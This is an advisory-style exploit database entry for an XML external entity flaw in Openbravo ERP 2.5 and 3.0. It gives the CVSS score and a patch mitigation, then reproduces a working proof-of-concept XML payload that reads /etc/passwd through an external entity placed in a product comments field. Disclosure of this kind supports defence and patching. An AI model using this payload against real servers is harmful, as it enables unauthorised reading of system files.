Openbravo ERP Information Disclosure Vulnerability

vendor:

ERP

by:

SecurityFocus

7,5

CVSS

HIGH

Information Disclosure

200

CWE

Product Name: ERP

Affected Version From: 2.5

Affected Version To: 3.0

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2013

Openbravo ERP Information Disclosure Vulnerability

Openbravo ERP is prone to an information-disclosure vulnerability. An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks. The vulnerability exists due to the application failing to properly sanitize user-supplied input. An attacker can exploit this issue by sending a specially crafted XML request containing an external entity declaration. This may allow the attacker to view arbitrary files on the affected computer.

Mitigation:

Users should apply the patch from the vendor's website.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/63431/info

Openbravo ERP is prone to an information-disclosure vulnerability.

An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.

Openbravo ERP 2.5 and 3.0 are vulnerable. 

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
 <!ELEMENT comments ANY >
 <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]>

<ob:Openbravo xmlns:ob="http://www.example.com"
xmlns:xsi="http://www.example1.com/2001/XMLSchema-instance">
        <Product id="C970393BDF6C43E2B030D23482D88EED" identifier="Zumo de Piñ,5L">
                <id>C970393BDF6C43E2B030D23482D88EED</id>
                <comments>&xxe;</comments>
        </Product>
</ob:Openbravo>